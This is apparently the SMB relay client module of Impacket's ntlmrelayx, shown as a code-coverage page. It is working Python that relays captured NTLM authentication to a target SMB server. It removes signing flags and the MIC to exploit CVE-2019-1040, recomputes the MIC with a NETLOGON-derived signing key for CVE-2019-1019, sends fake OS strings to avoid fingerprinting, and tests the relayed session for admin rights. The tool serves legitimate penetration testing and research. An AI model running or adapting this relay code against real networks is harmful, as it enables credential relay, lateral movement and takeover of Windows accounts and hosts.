Hide keyboard shortcuts

Hot-keys on this page

r m x p   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

440

441

442

443

444

445

446

447

448

449

450

451

452

453

454

455

456

457

458

459

460

461

462

463

464

465

466

467

468

469

470

471

472

473

474

475

476

477

478

479

480

481

482

483

484

485

486

487

488

489

490

491

492

493

494

495

496

497

498

499

500

501

502

503

504

505

506

507

508

509

510

511

512

513

514

515

516

517

518

519

520

521

522

523

524

525

526

527

528

529

530

531

532

533

534

535

536

537

538

539

540

541

542

543

544

545

546

547

548

549

550

551

552

553

554

555

556

557

558

559

560

561

562

563

564

565

566

567

568

569

570

571

572

573

574

575

576

577

578

579

580

581

582

583

584

585

586

587

588

589

590

591

592

593

594

595

596

597

598

599

600

601

602

603

604

605

606

607

608

609

610

611

612

613

614

615

616

# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. 

# 

# This software is provided under under a slightly modified version 

# of the Apache Software License. See the accompanying LICENSE file 

# for more information. 

# 

# SMB Relay Protocol Client 

# 

# Author: 

# Alberto Solino (@agsolino) 

# 

# Description: 

# This is the SMB client which initiates the connection to an 

# SMB server and relays the credentials to this server. 

 

import logging 

import os 

 

from binascii import unhexlify, hexlify 

from struct import unpack, pack 

from socket import error as socketerror 

from impacket.dcerpc.v5.rpcrt import DCERPCException 

from impacket.dcerpc.v5 import nrpc 

from impacket.dcerpc.v5 import transport 

from impacket.dcerpc.v5.ndr import NULL 

from impacket import LOG 

from impacket.examples.ntlmrelayx.clients import ProtocolClient 

from impacket.examples.ntlmrelayx.servers.socksserver import KEEP_ALIVE_TIMER 

from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_LOGON_FAILURE 

from impacket.ntlm import NTLMAuthNegotiate, NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMAuthChallenge, NTLMAuthChallengeResponse, \ 

generateEncryptedSessionKey, hmac_md5 

from impacket.smb import SMB, NewSMBPacket, SMBCommand, SMBSessionSetupAndX_Extended_Parameters, \ 

SMBSessionSetupAndX_Extended_Data, SMBSessionSetupAndX_Extended_Response_Data, \ 

SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Parameters 

from impacket.smb3 import SMB3, SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, \ 

SMB2_NEGOTIATE, SMB2Negotiate, SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30, SMB2_GLOBAL_CAP_LEASING, \ 

SMB3Packet, SMB2_GLOBAL_CAP_LARGE_MTU, SMB2_GLOBAL_CAP_DIRECTORY_LEASING, SMB2_GLOBAL_CAP_MULTI_CHANNEL, \ 

SMB2_GLOBAL_CAP_PERSISTENT_HANDLES, SMB2_NEGOTIATE_SIGNING_REQUIRED, SMB2Packet,SMB2SessionSetup, SMB2_SESSION_SETUP, STATUS_MORE_PROCESSING_REQUIRED, SMB2SessionSetup_Response 

from impacket.smbconnection import SMBConnection, SMB_DIALECT 

from impacket.ntlm import NTLMAuthChallenge, NTLMAuthNegotiate, NTLMSSP_NEGOTIATE_SIGN, NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMAuthChallengeResponse, NTLMSSP_NEGOTIATE_KEY_EXCH, NTLMSSP_NEGOTIATE_VERSION 

from impacket.spnego import SPNEGO_NegTokenInit, SPNEGO_NegTokenResp, TypesMech 

from impacket.dcerpc.v5.transport import SMBTransport 

from impacket.dcerpc.v5 import scmr 

 

PROTOCOL_CLIENT_CLASS = "SMBRelayClient" 

 

class MYSMB(SMB): 

def __init__(self, remoteName, sessPort = 445, extendedSecurity = True, nmbSession = None, negPacket=None): 

self.extendedSecurity = extendedSecurity 

SMB.__init__(self,remoteName, remoteName, sess_port = sessPort, session=nmbSession, negPacket=negPacket) 

 

def neg_session(self, negPacket=None): 

return SMB.neg_session(self, extended_security=self.extendedSecurity, negPacket=negPacket) 

 

class MYSMB3(SMB3): 

def __init__(self, remoteName, sessPort = 445, extendedSecurity = True, nmbSession = None, negPacket=None, preferredDialect=None): 

self.extendedSecurity = extendedSecurity 

SMB3.__init__(self,remoteName, remoteName, sess_port = sessPort, session=nmbSession, negSessionResponse=SMB2Packet(negPacket), preferredDialect=preferredDialect) 

 

def negotiateSession(self, preferredDialect = None, negSessionResponse = None): 

# We DON'T want to sign 

self._Connection['ClientSecurityMode'] = 0 

 

if self.RequireMessageSigning is True: 

LOG.error('Signing is required, attack won\'t work unless using -remove-target / --remove-mic') 

return 

 

self._Connection['Capabilities'] = SMB2_GLOBAL_CAP_ENCRYPTION 

currentDialect = SMB2_DIALECT_WILDCARD 

 

# Do we have a negSessionPacket already? 

if negSessionResponse is not None: 

# Yes, let's store the dialect answered back 

negResp = SMB2Negotiate_Response(negSessionResponse['Data']) 

currentDialect = negResp['DialectRevision'] 

 

if currentDialect == SMB2_DIALECT_WILDCARD: 

# Still don't know the chosen dialect, let's send our options 

 

packet = self.SMB_PACKET() 

packet['Command'] = SMB2_NEGOTIATE 

negSession = SMB2Negotiate() 

 

negSession['SecurityMode'] = self._Connection['ClientSecurityMode'] 

negSession['Capabilities'] = self._Connection['Capabilities'] 

negSession['ClientGuid'] = self.ClientGuid 

if preferredDialect is not None: 

negSession['Dialects'] = [preferredDialect] 

else: 

negSession['Dialects'] = [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30] 

negSession['DialectCount'] = len(negSession['Dialects']) 

packet['Data'] = negSession 

 

packetID = self.sendSMB(packet) 

ans = self.recvSMB(packetID) 

if ans.isValidAnswer(STATUS_SUCCESS): 

negResp = SMB2Negotiate_Response(ans['Data']) 

 

self._Connection['MaxTransactSize'] = min(0x100000,negResp['MaxTransactSize']) 

self._Connection['MaxReadSize'] = min(0x100000,negResp['MaxReadSize']) 

self._Connection['MaxWriteSize'] = min(0x100000,negResp['MaxWriteSize']) 

self._Connection['ServerGuid'] = negResp['ServerGuid'] 

self._Connection['GSSNegotiateToken'] = negResp['Buffer'] 

self._Connection['Dialect'] = negResp['DialectRevision'] 

if (negResp['SecurityMode'] & SMB2_NEGOTIATE_SIGNING_REQUIRED) == SMB2_NEGOTIATE_SIGNING_REQUIRED: 

LOG.error('Signing is required, attack won\'t work unless using -remove-target / --remove-mic') 

return 

if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LEASING) == SMB2_GLOBAL_CAP_LEASING: 

self._Connection['SupportsFileLeasing'] = True 

if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LARGE_MTU) == SMB2_GLOBAL_CAP_LARGE_MTU: 

self._Connection['SupportsMultiCredit'] = True 

 

if self._Connection['Dialect'] == SMB2_DIALECT_30: 

# Switching to the right packet format 

self.SMB_PACKET = SMB3Packet 

if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) == SMB2_GLOBAL_CAP_DIRECTORY_LEASING: 

self._Connection['SupportsDirectoryLeasing'] = True 

if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_MULTI_CHANNEL) == SMB2_GLOBAL_CAP_MULTI_CHANNEL: 

self._Connection['SupportsMultiChannel'] = True 

if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES) == SMB2_GLOBAL_CAP_PERSISTENT_HANDLES: 

self._Connection['SupportsPersistentHandles'] = True 

if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_ENCRYPTION) == SMB2_GLOBAL_CAP_ENCRYPTION: 

self._Connection['SupportsEncryption'] = True 

 

self._Connection['ServerCapabilities'] = negResp['Capabilities'] 

self._Connection['ServerSecurityMode'] = negResp['SecurityMode'] 

 

class SMBRelayClient(ProtocolClient): 

PLUGIN_NAME = "SMB" 

def __init__(self, serverConfig, target, targetPort = 445, extendedSecurity=True ): 

ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) 

self.extendedSecurity = extendedSecurity 

 

self.machineAccount = None 

self.machineHashes = None 

self.sessionData = {} 

 

self.negotiateMessage = None 

self.challengeMessage = None 

self.serverChallenge = None 

 

self.keepAliveHits = 1 

 

def netlogonSessionKey(self, authenticateMessageBlob): 

# Here we will use netlogon to get the signing session key 

logging.info("Connecting to %s NETLOGON service" % self.serverConfig.domainIp) 

 

respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob) 

authenticateMessage = NTLMAuthChallengeResponse() 

authenticateMessage.fromString(respToken2['ResponseToken']) 

_, machineAccount = self.serverConfig.machineAccount.split('/') 

domainName = authenticateMessage['domain_name'].decode('utf-16le') 

 

try: 

serverName = machineAccount[:len(machineAccount)-1] 

except: 

# We're in NTLMv1, not supported 

return STATUS_ACCESS_DENIED 

 

stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.serverConfig.domainIp 

 

rpctransport = transport.DCERPCTransportFactory(stringBinding) 

 

if len(self.serverConfig.machineHashes) > 0: 

lmhash, nthash = self.serverConfig.machineHashes.split(':') 

else: 

lmhash = '' 

nthash = '' 

 

if hasattr(rpctransport, 'set_credentials'): 

# This method exists only for selected protocol sequences. 

rpctransport.set_credentials(machineAccount, '', domainName, lmhash, nthash) 

 

dce = rpctransport.get_dce_rpc() 

dce.connect() 

dce.bind(nrpc.MSRPC_UUID_NRPC) 

resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', b'12345678') 

 

serverChallenge = resp['ServerChallenge'] 

 

if self.serverConfig.machineHashes == '': 

ntHash = None 

else: 

ntHash = unhexlify(self.serverConfig.machineHashes.split(':')[1]) 

 

sessionKey = nrpc.ComputeSessionKeyStrongKey('', b'12345678', serverChallenge, ntHash) 

 

ppp = nrpc.ComputeNetlogonCredential(b'12345678', sessionKey) 

 

nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00', 

nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00', 

ppp, 0x600FFFFF) 

 

clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10) 

 

# Now let's try to verify the security blob against the PDC 

 

request = nrpc.NetrLogonSamLogonWithFlags() 

request['LogonServer'] = '\x00' 

request['ComputerName'] = serverName + '\x00' 

request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4 

 

request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation 

request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation 

request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName 

request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0 

request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[ 

'user_name'].decode('utf-16le') 

request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = '' 

request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = self.serverChallenge 

request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm'] 

request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman'] 

 

authenticator = nrpc.NETLOGON_AUTHENTICATOR() 

authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey) 

authenticator['Timestamp'] = 10 

 

request['Authenticator'] = authenticator 

request['ReturnAuthenticator']['Credential'] = b'\x00' * 8 

request['ReturnAuthenticator']['Timestamp'] = 0 

request['ExtraFlags'] = 0 

# request.dump() 

try: 

resp = dce.request(request) 

# resp.dump() 

except DCERPCException as e: 

if logging.getLogger().level == logging.DEBUG: 

import traceback 

traceback.print_exc() 

logging.error(str(e)) 

return e.get_error_code() 

 

logging.info("%s\\%s successfully validated through NETLOGON" % ( 

domainName, authenticateMessage['user_name'].decode('utf-16le'))) 

 

encryptedSessionKey = authenticateMessage['session_key'] 

if encryptedSessionKey != b'': 

signingKey = generateEncryptedSessionKey( 

resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey) 

else: 

signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey'] 

 

logging.info("SMB Signing key: %s " % hexlify(signingKey).decode('utf-8')) 

 

return STATUS_SUCCESS, signingKey 

 

def keepAlive(self): 

# SMB Keep Alive more or less every 5 minutes 

if self.keepAliveHits >= (250 / KEEP_ALIVE_TIMER): 

# Time to send a packet 

# Just a tree connect / disconnect to avoid the session timeout 

tid = self.session.connectTree('IPC$') 

self.session.disconnectTree(tid) 

self.keepAliveHits = 1 

else: 

self.keepAliveHits +=1 

 

def killConnection(self): 

if self.session is not None: 

self.session.close() 

self.session = None 

 

def initConnection(self): 

self.session = SMBConnection(self.targetHost, self.targetHost, sess_port= self.targetPort, manualNegotiate=True) 

#,preferredDialect=SMB_DIALECT) 

if self.serverConfig.smb2support is True: 

data = '\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00' 

else: 

data = '\x02NT LM 0.12\x00' 

 

if self.extendedSecurity is True: 

flags2 = SMB.FLAGS2_EXTENDED_SECURITY | SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES 

else: 

flags2 = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES 

try: 

packet = self.session.negotiateSessionWildcard(None, self.targetHost, self.targetHost, self.targetPort, 60, self.extendedSecurity, 

flags1=SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS, 

flags2=flags2, data=data) 

except socketerror as e: 

if 'reset by peer' in str(e): 

if not self.serverConfig.smb2support: 

LOG.error('SMBCLient error: Connection was reset. Possibly the target has SMBv1 disabled. Try running ntlmrelayx with -smb2support') 

else: 

LOG.error('SMBCLient error: Connection was reset') 

else: 

LOG.error('SMBCLient error: %s' % str(e)) 

return False 

if packet[0:1] == b'\xfe': 

preferredDialect = None 

# Currently only works with SMB2_DIALECT_002 or SMB2_DIALECT_21 

if self.serverConfig.remove_target: 

preferredDialect = SMB2_DIALECT_21 

smbClient = MYSMB3(self.targetHost, self.targetPort, self.extendedSecurity,nmbSession=self.session.getNMBServer(), 

negPacket=packet, preferredDialect=preferredDialect) 

else: 

# Answer is SMB packet, sticking to SMBv1 

smbClient = MYSMB(self.targetHost, self.targetPort, self.extendedSecurity,nmbSession=self.session.getNMBServer(), 

negPacket=packet) 

 

self.session = SMBConnection(self.targetHost, self.targetHost, sess_port= self.targetPort, 

existingConnection=smbClient, manualNegotiate=True) 

 

return True 

 

def setUid(self,uid): 

self._uid = uid 

 

def sendNegotiate(self, negotiateMessage): 

negoMessage = NTLMAuthNegotiate() 

negoMessage.fromString(negotiateMessage) 

# When exploiting CVE-2019-1040, remove flags 

if self.serverConfig.remove_mic: 

if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN: 

negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN 

if negoMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN: 

negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN 

if negoMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH: 

negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH 

if negoMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION: 

negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION 

 

negotiateMessage = negoMessage.getData() 

 

challenge = NTLMAuthChallenge() 

if self.session.getDialect() == SMB_DIALECT: 

challenge.fromString(self.sendNegotiatev1(negotiateMessage)) 

else: 

challenge.fromString(self.sendNegotiatev2(negotiateMessage)) 

 

self.negotiateMessage = negotiateMessage 

self.challengeMessage = challenge.getData() 

 

# Store the Challenge in our session data dict. It will be used by the SMB Proxy 

self.sessionData['CHALLENGE_MESSAGE'] = challenge 

self.serverChallenge = challenge['challenge'] 

 

return challenge 

 

def sendNegotiatev2(self, negotiateMessage): 

v2client = self.session.getSMBServer() 

 

sessionSetup = SMB2SessionSetup() 

sessionSetup['Flags'] = 0 

 

# Let's build a NegTokenInit with the NTLMSSP 

blob = SPNEGO_NegTokenInit() 

 

# NTLMSSP 

blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']] 

blob['MechToken'] = negotiateMessage 

 

sessionSetup['SecurityBufferLength'] = len(blob) 

sessionSetup['Buffer'] = blob.getData() 

 

packet = v2client.SMB_PACKET() 

packet['Command'] = SMB2_SESSION_SETUP 

packet['Data'] = sessionSetup 

 

packetID = v2client.sendSMB(packet) 

ans = v2client.recvSMB(packetID) 

if ans.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED): 

v2client._Session['SessionID'] = ans['SessionID'] 

sessionSetupResponse = SMB2SessionSetup_Response(ans['Data']) 

respToken = SPNEGO_NegTokenResp(sessionSetupResponse['Buffer']) 

return respToken['ResponseToken'] 

 

return False 

 

def sendNegotiatev1(self, negotiateMessage): 

v1client = self.session.getSMBServer() 

 

smb = NewSMBPacket() 

smb['Flags1'] = SMB.FLAGS1_PATHCASELESS 

smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY 

# Are we required to sign SMB? If so we do it, if not we skip it 

if v1client.is_signing_required(): 

smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE 

 

# Just in case, clear the Unicode Flag 

flags2 = v1client.get_flags ()[1] 

v1client.set_flags(flags2=flags2 & (~SMB.FLAGS2_UNICODE)) 

 

sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) 

sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters() 

sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data() 

 

sessionSetup['Parameters']['MaxBufferSize'] = 65535 

sessionSetup['Parameters']['MaxMpxCount'] = 2 

sessionSetup['Parameters']['VcNumber'] = 1 

sessionSetup['Parameters']['SessionKey'] = 0 

sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE 

 

# Let's build a NegTokenInit with the NTLMSSP 

# TODO: In the future we should be able to choose different providers 

 

blob = SPNEGO_NegTokenInit() 

 

# NTLMSSP 

blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']] 

blob['MechToken'] = negotiateMessage 

 

sessionSetup['Parameters']['SecurityBlobLength'] = len(blob) 

sessionSetup['Parameters'].getData() 

sessionSetup['Data']['SecurityBlob'] = blob.getData() 

 

# Fake Data here, don't want to get us fingerprinted 

sessionSetup['Data']['NativeOS'] = 'Unix' 

sessionSetup['Data']['NativeLanMan'] = 'Samba' 

 

smb.addCommand(sessionSetup) 

v1client.sendSMB(smb) 

smb = v1client.recvSMB() 

 

try: 

smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX) 

except Exception: 

LOG.error("SessionSetup Error!") 

raise 

else: 

# We will need to use this uid field for all future requests/responses 

v1client.set_uid(smb['Uid']) 

 

# Now we have to extract the blob to continue the auth process 

sessionResponse = SMBCommand(smb['Data'][0]) 

sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters']) 

sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2']) 

sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength'] 

sessionData.fromString(sessionResponse['Data']) 

respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob']) 

 

return respToken['ResponseToken'] 

 

def sendStandardSecurityAuth(self, sessionSetupData): 

v1client = self.session.getSMBServer() 

flags2 = v1client.get_flags()[1] 

v1client.set_flags(flags2=flags2 & (~SMB.FLAGS2_EXTENDED_SECURITY)) 

if sessionSetupData['Account'] != '': 

smb = NewSMBPacket() 

smb['Flags1'] = 8 

 

sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) 

sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters() 

sessionSetup['Data'] = SMBSessionSetupAndX_Data() 

 

sessionSetup['Parameters']['MaxBuffer'] = 65535 

sessionSetup['Parameters']['MaxMpxCount'] = 2 

sessionSetup['Parameters']['VCNumber'] = os.getpid() 

sessionSetup['Parameters']['SessionKey'] = v1client._dialects_parameters['SessionKey'] 

sessionSetup['Parameters']['AnsiPwdLength'] = len(sessionSetupData['AnsiPwd']) 

sessionSetup['Parameters']['UnicodePwdLength'] = len(sessionSetupData['UnicodePwd']) 

sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE 

 

sessionSetup['Data']['AnsiPwd'] = sessionSetupData['AnsiPwd'] 

sessionSetup['Data']['UnicodePwd'] = sessionSetupData['UnicodePwd'] 

sessionSetup['Data']['Account'] = sessionSetupData['Account'] 

sessionSetup['Data']['PrimaryDomain'] = sessionSetupData['PrimaryDomain'] 

sessionSetup['Data']['NativeOS'] = 'Unix' 

sessionSetup['Data']['NativeLanMan'] = 'Samba' 

 

smb.addCommand(sessionSetup) 

 

v1client.sendSMB(smb) 

smb = v1client.recvSMB() 

try: 

smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX) 

except: 

return None, STATUS_LOGON_FAILURE 

else: 

v1client.set_uid(smb['Uid']) 

return smb, STATUS_SUCCESS 

else: 

# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials 

clientResponse = None 

errorCode = STATUS_ACCESS_DENIED 

 

return clientResponse, errorCode 

 

def sendAuth(self, authenticateMessageBlob, serverChallenge=None): 

 

authMessage = NTLMAuthChallengeResponse() 

authMessage.fromString(authenticateMessageBlob) 

# When exploiting CVE-2019-1040, remove flags 

if self.serverConfig.remove_mic: 

if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN: 

authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN 

if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN: 

authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN 

if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH: 

authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH 

if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION: 

authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION 

authMessage['MIC'] = b'' 

authMessage['MICLen'] = 0 

authMessage['Version'] = b'' 

authMessage['VersionLen'] = 0 

authenticateMessageBlob = authMessage.getData() 

 

if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP: 

# We need to wrap the NTLMSSP into SPNEGO 

respToken2 = SPNEGO_NegTokenResp() 

respToken2['ResponseToken'] = authenticateMessageBlob 

authData = respToken2.getData() 

else: 

authData = authenticateMessageBlob 

 

signingKey = None 

if self.serverConfig.remove_target: 

# Trying to exploit CVE-2019-1019 

# Discovery and Implementation by @simakov_marina and @YaronZi 

respToken2 = SPNEGO_NegTokenResp(authData) 

authenticateMessageBlob = respToken2['ResponseToken'] 

 

errorCode, signingKey = self.netlogonSessionKey(authData) 

 

# Recalculate MIC 

res = NTLMAuthChallengeResponse() 

res.fromString(authenticateMessageBlob) 

 

newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:] 

relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob) 

 

respToken2 = SPNEGO_NegTokenResp() 

respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:] 

authData = respToken2.getData() 

 

if self.session.getDialect() == SMB_DIALECT: 

token, errorCode = self.sendAuthv1(authData, serverChallenge) 

else: 

token, errorCode = self.sendAuthv2(authData, serverChallenge) 

 

if signingKey: 

logging.info("Enabling session signing") 

self.session._SMBConnection.set_session_key(signingKey) 

 

return token, errorCode 

 

def sendAuthv2(self, authenticateMessageBlob, serverChallenge=None): 

v2client = self.session.getSMBServer() 

 

sessionSetup = SMB2SessionSetup() 

sessionSetup['Flags'] = 0 

 

packet = v2client.SMB_PACKET() 

packet['Command'] = SMB2_SESSION_SETUP 

packet['Data'] = sessionSetup 

 

# Reusing the previous structure 

sessionSetup['SecurityBufferLength'] = len(authenticateMessageBlob) 

sessionSetup['Buffer'] = authenticateMessageBlob 

 

packetID = v2client.sendSMB(packet) 

packet = v2client.recvSMB(packetID) 

 

return packet, packet['Status'] 

 

def sendAuthv1(self, authenticateMessageBlob, serverChallenge=None): 

v1client = self.session.getSMBServer() 

 

smb = NewSMBPacket() 

smb['Flags1'] = SMB.FLAGS1_PATHCASELESS 

smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY 

# Are we required to sign SMB? If so we do it, if not we skip it 

if v1client.is_signing_required(): 

smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE 

smb['Uid'] = v1client.get_uid() 

 

sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) 

sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters() 

sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data() 

 

sessionSetup['Parameters']['MaxBufferSize'] = 65535 

sessionSetup['Parameters']['MaxMpxCount'] = 2 

sessionSetup['Parameters']['VcNumber'] = 1 

sessionSetup['Parameters']['SessionKey'] = 0 

sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE 

 

# Fake Data here, don't want to get us fingerprinted 

sessionSetup['Data']['NativeOS'] = 'Unix' 

sessionSetup['Data']['NativeLanMan'] = 'Samba' 

 

sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob) 

sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob 

smb.addCommand(sessionSetup) 

v1client.sendSMB(smb) 

 

smb = v1client.recvSMB() 

 

errorCode = smb['ErrorCode'] << 16 

errorCode += smb['_reserved'] << 8 

errorCode += smb['ErrorClass'] 

 

return smb, errorCode 

 

def getStandardSecurityChallenge(self): 

if self.session.getDialect() == SMB_DIALECT: 

return self.session.getSMBServer().get_encryption_key() 

else: 

return None 

 

def isAdmin(self): 

rpctransport = SMBTransport(self.session.getRemoteHost(), 445, r'\svcctl', smb_connection=self.session) 

dce = rpctransport.get_dce_rpc() 

try: 

dce.connect() 

except: 

pass 

else: 

dce.bind(scmr.MSRPC_UUID_SCMR) 

try: 

# 0xF003F - SC_MANAGER_ALL_ACCESS 

# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx 

ans = scmr.hROpenSCManagerW(dce,'{}\x00'.format(self.target.hostname),'ServicesActive\x00', 0xF003F) 

return "TRUE" 

except scmr.DCERPCException as e: 

pass 

return "FALSE"